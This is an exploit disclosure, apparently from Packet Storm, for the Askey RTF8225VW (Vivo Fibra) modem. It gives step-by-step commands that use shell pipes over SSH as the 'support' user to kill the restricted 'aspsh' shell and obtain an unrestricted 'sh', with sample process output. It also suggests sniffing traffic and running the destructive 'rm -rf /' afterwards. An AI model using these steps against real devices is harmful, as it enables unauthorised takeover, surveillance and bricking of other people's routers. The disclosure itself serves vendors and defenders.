Vivo Fibra Askey RTF8225VW Command Execution
2024-10-14 21:28:11 Author: packetstormsecurity.com(查看原文) 阅读量:6 收藏

---

# Exploit 1

## Documentation on the Vivo Fibra Modem Exploit

I discovered an exploit that allows access to the `sh` shell on the Vivo Fibra modem. This method essentially involves terminating the `aspsh` shell and invoking `sh` using the output of `cat /dev/null`. Using the pipe (`|`) is crucial for this exploit, it is the base of the exploit.

## Known Affected Devices

- **Model**: Askey RTF8225VW
- **Software Version**: BR_SG_g1.13_RTF_TEF004_V2.35
- **Revision**: REV3
- **CLI Version**: Reduced_CLI_HGU_v26 (Vivo Fibra firmware)
- **System Info**: Linux (none) 4.4.115

## The Exploit

To begin, access the modem by connecting to `support@{modem's IP}` via SSH. It does not matter if the connection is local or public, as SSH port (22) is open to the internet. The `support` user has privileged access, but the password is the same as the admin password.

You will need to enter the password, which is typically an 8-digit mix of letters and numbers. Once logged in, you will be greeted with `aspsh`, a very limited shell designed for technical services. Its purpose is to prevent you from using `sh` or `bash` for security reasons.

The critical part begins here: the only Unix-like programs you can execute are `ls`, `top`, `cat`, and `free`. There are other programs available in `aspsh`, but they are not useful for this exploit.

## How to Execute the Exploit

In `aspsh`, enter the following command:

```aspsh
cat /dev/null | ps | grep aspsh
```

This command helps you discover the process ID of `aspsh -k`. The `cat /dev/null` command returns nothing, allowing you to execute `ps` and `grep aspsh`. The output should look something like this:

```
2298 support 13612 S aspsh -k
27492 support 13608 S -aspsh
31961 support 3308 S sh -c cat /dev/null | ps | grep aspsh
31964 support 3312 S grep aspsh
```

Once you have identified the process ID, you can terminate the `aspsh` loop that restricts your access.

Next, run the command:

```aspsh
cat /dev/null | kill 2298 && sh
```

In this command, `cat /dev/null` still returns nothing, allowing you to use its output to kill the `aspsh -k` process. The `&& sh` part then invokes `sh` in its place.

And that's it! You now have access to `sh`, providing you with unlimited possibilities for manipulating your modem.

## Why This Exploit Is Dangerous

If someone with malicious intent exploits this vulnerability, they could use tools like Wireshark or similar applications to monitor network activity. They could also execute destructive commands like `rm -rf /`, effectively destroying the system and rendering the hardware essentially unusable, with no option to reset it.

---


文章来源: https://packetstormsecurity.com/files/182171/vivofibraaskeyRTF8225VW-exec.txt
如有侵权请联系:admin#unsafe.sh